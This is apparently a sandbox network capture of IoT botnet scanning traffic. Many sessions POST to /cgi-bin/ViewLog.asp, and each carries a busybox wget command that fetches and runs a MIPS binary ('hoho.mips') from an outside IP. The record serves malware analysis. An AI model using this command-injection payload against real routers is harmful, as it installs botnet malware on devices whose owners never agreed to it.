                                              Nov 23, 2023 05:17:49.810142994 CET1023INHTTP/1.1 404
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: de
                                              Content-Length: 785
                                              Date: Thu, 23 Nov 2023 04:17:49 GMT
                                              Keep-Alive: timeout=20
                                              Connection: keep-alive
                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 5b 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 5d 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 3c 2f 70 3e 3c 70 3e 3c 62 3e 42 65 73 63 68 72 65 69 62 75 6e 67 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 38 2e 35 2e 37 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!doctype html><html lang="de"><head><title>HTTP Status 404 nicht gefunden</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 nicht gefunden</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [&#47;cgi-bin&#47;ViewLog.asp] is not available</p><p><b>Beschreibung</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/8.5.79</h3></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              545192.168.2.133505862.34.72.2308080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:49.753087997 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              546192.168.2.134559231.136.41.978080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:49.757133007 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:52.934247017 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:59.078222036 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:11.110229969 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              547192.168.2.133443231.136.121.488080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:49.757558107 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:52.934235096 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:59.078229904 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:11.110208035 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              548192.168.2.135108494.121.99.1138080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:49.796931982 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              549192.168.2.134537694.100.22.548080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:49.797926903 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:49.989419937 CET546INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 04:17:49 GMT
                                              Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/7.4.28
                                              Content-Length: 217
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              550192.168.2.134221831.128.218.1638080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:49.805002928 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:50.036987066 CET475INHTTP/1.1 200 OK
                                              Content-Security-Policy: default-src *; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; frame-ancestors 'self'
                                              X-Frame-Options: SAMEORIGIN
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Date: Thu, 23 Nov 2023 04:17:49 GMT
                                              Etag: "5fec3572.1676"
                                              Content-Type: text/html
                                              Content-Length: 1676
                                              Connection: close
                                              Accept-Ranges: bytes


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              551192.168.2.135512285.158.59.228080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:49.806699038 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              552192.168.2.133777285.99.114.938080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:49.822422981 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:50.052875042 CET375INHTTP/1.0 404 Not Found
                                              Date: Thu, 23 Nov 2023 04:17:49 GMT
                                              Server: Boa/0.94.13
                                              Connection: close
                                              Content-Type: text/html; charset=ISO-8859-1
                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              553192.168.2.134663631.200.30.638080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:49.862262011 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              554192.168.2.135477294.122.13.398080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:49.978789091 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              555192.168.2.135460231.40.150.18080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:49.991106987 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              556192.168.2.135162631.200.111.2498080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:50.201822042 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              557192.168.2.134200894.120.225.2378080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:50.223170996 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
